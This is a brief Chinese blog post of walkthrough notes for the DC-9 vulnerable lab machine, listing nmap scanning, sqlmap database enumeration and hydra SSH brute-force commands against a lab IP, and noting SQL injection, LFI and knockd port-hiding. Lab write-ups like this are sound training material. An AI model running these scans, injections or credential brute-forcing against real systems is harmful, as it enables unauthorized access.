靶机DC-9的通关笔记

sudo arp-scan -l

sudo nmap -sS -A -p- -n -Pn -T4 -oN DC9 192.168.1.144

sqlmap -r target.txt -random-agent --dbs

hydra -L username.txt -P password.txt ssh://192.168.1.144

最后总结：

　　1.sql注入和LFI 的组合题，LFI的字典要很强大，就直接可以爆破出/etc/knockd
　　2.knockd用来隐藏ssh登陆端口（学到了）
　　3./usr/bin/test也是一个正常的linux命令，，，检查文件类型和比较值（学到了）

　　4.我真菜

posted @ 2020-04-23 13:37 木讷叶阅读(419) 评论(0) 收藏举报

刷新页面返回顶部

(-夜-)